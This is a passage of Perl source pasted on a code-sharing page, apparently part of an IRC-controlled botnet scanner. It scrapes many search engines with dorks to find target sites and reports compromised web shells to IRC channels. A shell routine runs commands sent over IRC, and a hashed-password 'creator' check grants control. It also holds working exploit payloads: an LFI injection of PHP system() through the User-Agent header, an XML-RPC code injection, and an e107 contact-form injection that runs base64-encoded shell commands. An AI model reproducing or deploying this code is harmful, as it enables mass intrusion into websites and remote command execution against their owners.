  3194. return @list;
  3195. }
  3196. sub optuszoo(){
  3197.         my @list;
  3198.         my $key = $_[0];
  3199.         for($b=10;$b<=1000;$b+=100){
  3200.                 my $Th=("http://www.optuszoo.com.au/search?q=".key($key)."&start=".$b."&target=web");
  3201.                 my $Res=&search_engine_query($Th);
  3202.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3203.                         my $link = $1; if ($link!~ /optuszoo/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3204.                         }
  3205.                 }
  3206. return @list;
  3207. }
  3208. sub search66(){
  3209.         my @list;
  3210.         my $key = $_[0];
  3211.         for($b=10;$b<=1000;$b+=100){
  3212.                 my $Th=("http://search.search66.com/?query=".key($key)."&start=".$b."&offset=20&lang=ENG");
  3213.                 my $Res=&search_engine_query($Th);
  3214.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3215.                         my $link = $1; if ($link!~ /search66/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3216.                         }
  3217.                 }
  3218. return @list;
  3219. }
  3220. sub arrama(){
  3221.         my @list;
  3222.         my $key = $_[0];
  3223.         for($b=10;$b<=1000;$b+=100){
  3224.                 my $Th=("http://www.arrama.com/arama.html?cx=partner-pub-8986600646077390%3A3up8c9-e187&cof=FORID%3A10&ie=UTF-8&q=".key($key)."&sa=Web'de+Ara-Bul&siteurl=www.arrama.com%2F#8".$b."");
  3225.                 my $Res=&search_engine_query($Th);
  3226.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3227.                         my $link = $1; if ($link!~ /arrama/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3228.                 }
  3229.         }
  3230. return @list;
  3231. }
  3232. sub excitejp(){
  3233.         my @list;
  3234.         my $key = $_[0];
  3235.         for($b=10;$b<=1000;$b+=100){
  3236.                 my $Th=("http://www.excite.co.jp/search.gw?target=combined&look=excite_jp&Language=&sstype=excite_r&search=".key($key)."&FirstResult=".$b."");
  3237.                 my $Res=&search_engine_query($Th);
  3238.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3239.                         my $link = $1; if ($link!~ /excite/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3240.                 }
  3241.         }
  3242. return @list;
  3243. }
  3244. sub biglobe(){
  3245.         my @list;
  3246.         my $key = $_[0];
  3247.         for($b=10;$b<=1000;$b+=100){
  3248.                 my $Th=("http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=25&q=".key($key)."&lr=all");
  3249.                 my $Res=&search_engine_query($Th);
  3250.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3251.                         my $link = $1; if ($link!~ /biglobe/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3252.                 }
  3253.         }
  3254. return @list;
  3255. }      
  3256. sub clix(){
  3257.         my @list;
  3258.         my $key = $_[0];
  3259.         for($b=1;$b<=1000;$b+=100){
  3260.                 my $Th=("http://pesquisa.clix.pt/resultado.html?question=".key($key)."&in=Mundial&num=25&ckWhere=Mundo&position=".$b."");
  3261.                 my $Res=&search_engine_query($Th);
  3262.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3263.                         my $link = $1; if ($link!~ /clix/ ){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3264.                 }
  3265.         }
  3266. return @list;
  3267. }
  3268. sub searchch(){
  3269.         my @list;
  3270.         my $key = $_[0];
  3271.         for($b=10;$b<=1000;$b+=100){
  3272.                 my $Th=("http://web.search.ch/?rank=".$b."&q=".key($key)."");
  3273.                 my $Res=&search_engine_query($Th);
  3274.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3275.                         my $link = $1; if ($1 !~ /search\.ch/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3276.                 }
  3277.         }
  3278. return @list;
  3279. }
  3280. sub cada(){
  3281.         my @list;
  3282.         my $key = $_[0];
  3283.         for($b=10;$b<=1000;$b+=100){
  3284.                 my $Th=("http://cade.search.yahoo.com/search;_ylt=A0geu8ny1rRO8gQADw7b7Qt.?p=".key($key)."&fr=sfp&xargs=0&pstart=1&b=".$b);
  3285.                 my $Res=&search_engine_query($Th);
  3286.                 while($Res =~ m/http:\/\/(.+?)\//g){
  3287.                         my $link = $1; if ($1 !~ /cada|yahoo/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); }
  3288.                         }
  3289.                 }
  3290. return @list;
  3291. }
  3292.  
  3293. #########################################
  3294. sub clean() {
  3295.     my @cln = ();
  3296.     my %visit = ();
  3297.     foreach my $element (@_) {
  3298.         $element =~ s/\/+/\//g;
  3299.         next if $visit{$element}++;
  3300.         push @cln, $element;
  3301.     }
  3302.     return @cln;
  3303. }
  3304. sub htmltourl { my $str = $_[0]; $str =~ s/&amp;/&/g; return $str; }
  3305. sub key() {
  3306.     my $dork = $_[0];
  3307.     $dork =~ s/ /\+/g;
  3308.     $dork =~ s/:/\%3A/g;
  3309.     $dork =~ s/\//\%2F/g;
  3310.     $dork =~ s/\?/\%3F/g;
  3311.     $dork =~ s/&/\%26/g;
  3312.     $dork =~ s/\"/\%22/g;
  3313.     $dork =~ s/,/\%2C/g;
  3314.     $dork =~ s/\\/\%5C/g;
  3315.         $dork =~ s/@/\%40/g;
  3316.         $dork =~ s/\[/\%5B/g;
  3317.         $dork =~ s/\]/\%5D/g;
  3318.         $dork =~ s/\?/\%3F/g;
  3319.         $dork =~ s/\=/\%3D/g;
  3320.         $dork =~ s/\|/\%7C/g;
  3321.     return $dork;
  3322. }
  3323.  
  3324. sub links() {
  3325.     my @list;
  3326.     my $link = $_[0];
  3327.     my $host = $_[0];
  3328.     my $hdir = $_[0];
  3329.     $hdir =~ s/(.*)\/[^\/]*$/$1/;
  3330.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  3331.     $host .= "/";
  3332.     $link .= "/";
  3333.     $hdir .= "/";
  3334.     $host =~ s/\/\//\//g;
  3335.     $hdir =~ s/\/\//\//g;
  3336.     $link =~ s/\/\//\//g;
  3337.     push(@list,$link,$host,$hdir);
  3338.     return @list;
  3339. }
  3340.  
  3341. sub search_engine_query($) {
  3342.     my $url = $_[0];
  3343.     $url =~ s/http:\/\///;
  3344.     my $host = $url;
  3345.     my $query = $url;
  3346.     my $page  = "";
  3347.     $host =~ s/href=\"?http:\/\///;
  3348.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  3349.     $query =~ s/$host//;
  3350.     if ($query eq "") { $query = "/"; }
  3351.         eval {
  3352.             my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  3353.             print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
  3354.             my @pages = <$sock>;
  3355.             $page = "@pages";
  3356.             close($sock);
  3357.         };
  3358.     return $page;
  3359. }
  3360.  
  3361. ##[ INFO OS ]##
  3362. sub info_main {
  3363.   my ($url,$chan,$engine,$logo) = @_;
  3364.   my $safemode;
  3365.  
  3366. my @inff = ("2","3","5","13","11","12"); # info
  3367. $infoc = $inff[rand(scalar(@inff))]; my $inc = $infoc;
  3368.  
  3369. my @inft = ("7","6","10","8","14","15"); # info txt
  3370. $inftc = $inft[rand(scalar(@inft))]; my $inf = $inftc;
  3371.  
  3372.         my $check = &get_content($url);sleep(3);
  3373.         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) {
  3374.                 my $safe =""; my $os ="";my $uname ="";my $server ="";my $user ="";my $uid ="";my $dir ="";my $perm ="";my $hdd ="";my $disfunc ="";
  3375.                 if ($check =~ m/<font face='verdana' size='2'><b>SAFE:<\/b> (.+?)<\/font><br>/g ) { $safe = $1; }
  3376.                 if ($check =~ m/<font face='verdana' size='2'><b>OS:<\/b> (.+?)<\/font><br>/g ) { $os = $1; }
  3377.                 if ($check =~ m/<font face='verdana' size='2'><b>UNAME:<\/b> (.+?)<\/font><br>/g ) { $uname = $1; }
  3378.                 if ($check =~ m/<font face='verdana' size='2'><b>SERVER:<\/b> (.+?)<\/font><br>/g ) { $server = $1; }
  3379.                 if ($check =~ m/<font face='verdana' size='2'><b>USER:<\/b> (.+?)<\/font><br>/g ) { $user = $1; }
  3380.                 if ($check =~ m/<font face='verdana' size='2'><b>UID:<\/b> (.+?)<\/font><br>/g ) { $uid = $1; }
  3381.                 if ($check =~ m/<font face='verdana' size='2'><b>DIR:<\/b> (.+?)<\/font><br>/g ) { $dir = $1; }
  3382.                 if ($check =~ m/<font face='verdana' size='2'><b>PERM:<\/b> (.+?)<\/font><br>/g ) { $perm = $1; }
  3383.                 if ($check =~ m/<font face='verdana' size='2'><b>HDD:<\/b> (.+?)<\/font><br>/g ) { $hdd = $1; }
  3384.                 if ($check =~ m/<font face='verdana' size='2'><b>DISFUNC:<\/b> (.+?)<\/font><br>/g ) { $disfunc = $1; }
  3385.                 if ($safe =~ /OFF/) { $safemode = "9OFF (Not Secure)"; } elsif ($safe =~ /ON/) { $safemode ="4ON (Secure)"; } else { $safemode ="1-"; }
  3386.                 if ($disfunc) { $disfunc = "12(4@".$inc."Disfunc12)".$inf." $disfunc "; } else { $disfunc = ""; }
  3387.                 if ($perm =~/W/) { $perm = "$perm"; } else { $perm = "$perm"; }
  3388.                         &msg("$chan","$logo12(4@0$engine12)(4@8SHELL12)13 ".$url." 12(4@8safemode12) ".$safemode." 12(4@8OS12)13 ".$os." ");
  3389.                         if ($conf{shchan} == 1) {
  3390.                
  3391.                                 &msg("$shchn","12(4@".$inc."SHELL12)".$inf." ".$url." 12(4@".$inc."safemode12) ".$safemode." 12(4@".$inc."OS12)".$inf." ".$os." ");
  3392.                                 &msg("$shchn","12(4@".$inc."Uname12)".$inf." ".$uname." 12(4@".$inc."User12)".$inf." ".$user." ".$inc."/".$inf." ".$uid." 12(4@".$inc."Server12)".$inf." ".$server." ");
  3393.                                 &msg("$shchn","12(4@".$inc."Dir12)".$inf." ".$dir." ".$perm." 12(4@".$inc."HDD12)".$inf." ".$hdd." ".$disfunc." ");sleep(2);
  3394.  
  3395.                         }
  3396.         }
  3397. }
  3398.  
  3399. #########################################
  3400. sub shell() {
  3401.     my $path = $_[0];
  3402.     my $cmd = $_[1];
  3403.     if ($cmd =~ /cd (.*)/) {
  3404.         chdir("$1") || &msg("$path","No such file or directory");
  3405.         return;
  3406.     }
  3407.     elsif ($pid = fork) { waitpid($pid, 0); }
  3408.     else { if (fork) { exit; } else {
  3409.         my @output = `$cmd 2>&1 3>&1`;
  3410.         my $c = 0;
  3411.         foreach my $output (@output) {
  3412.             $c++;
  3413.             chop $output;
  3414.             &msg("$path","$output");
  3415.             if ($c == 5) { $c = 0; sleep 2; }
  3416.         }
  3417.         exit;
  3418.     }}
  3419. }
  3420.  
  3421. sub creator() {
  3422.         my $status = 0;
  3423.         my $master = $_[0];
  3424.         if (&md5_hex($master) =~ "636d407d474e8d3bab31c3da4a1908e9") { $status = 1 }
  3425.         if (&md5_hex($master) =~ "1624b927eecd7d3ab2d7b6ba91f7adf8") { $status = 1 }
  3426.         return $status;
  3427. }
  3428.  
  3429. sub isAdmin() {
  3430.     my $status = 0;
  3431.     my $nick = $_[0];
  3432.     if ($nick eq $admin) { $status = 1; }
  3433.     return $status;
  3434. }
  3435.  
  3436. sub msg() {
  3437.     return unless $#_ == 1;
  3438.     sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
  3439. }
  3440.  
  3441. sub nick() {
  3442.     return unless $#_ == 0;
  3443.     sendraw("NICK $_[0]");
  3444. }
  3445.  
  3446. sub notice() {
  3447.     return unless $#_ == 1;
  3448.     sendraw("NOTICE $_[0] :$_[1]");
  3449. }
  3450.  
  3451. sub cmdlfi() {
  3452. my $browser = LWP::UserAgent->new;
  3453. my $url  = $_[0];
  3454. my $cmd  = $_[1];
  3455. my $chan = $_[2];
  3456. my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
  3457. $browser->agent("$hie");
  3458. $browser->timeout(7);
  3459. $response = $browser->get( $url );
  3460. if ($response->content =~ /j13mbut(.*)j13mbut/s) {
  3461. &msg("$chan","0,1(0LFI0)4 $1 ");
  3462. } else {
  3463. &msg("$chan","0,1(0LFI0)4 No Output ");
  3464. }
  3465. }
  3466.  
  3467. sub cmdxml() {
  3468. my $jed  = $_[0];
  3469. my $dwa  = $_[1];
  3470. my $chan = $_[2];
  3471. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  3472.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  3473.         $exploit .= "<methodName>test.method</methodName>";
  3474.         $exploit .= "<params><param><value><name>',''));";
  3475.         $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
  3476. my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
  3477. if ($response->content =~ /bamby(.*)solo/s) {
  3478. &msg("$chan","0,1(0XML0)4 $1 ");
  3479. } else {
  3480. &msg("$chan","0,1(0XML0)4 No Output ");
  3481. }
  3482. }
  3483.  
  3484. sub cmde107() {
  3485. my $path  = $_[0];
  3486. my $code = $_[1];
  3487. my $chan  = $_[2];
  3488. my $codecmd = encode_base64($code);
  3489. my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
  3490.     my $req = HTTP::Request->new(POST => $path);
  3491.     $req->content_type('application/x-www-form-urlencoded');
  3492.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  3493.     my $ua = LWP::UserAgent->new(agent => $uagent);
  3494.     $ua->timeout(7);
  3495.     my $res = $ua->request($req);
  3496. my $data = $res->as_string;
  3497. if ( $data =~ /ByroeNet(.*)/ ){
  3498.      $mydata = $1;
  3499. &msg("$chan","0,1(0E1070)4 $mydata ");
  3500. }
  3501. else { &msg("$chan","0,1(0E1070)4 No Output "); }
  3502. }

Reply to "Scanner"

Here you can reply to the paste above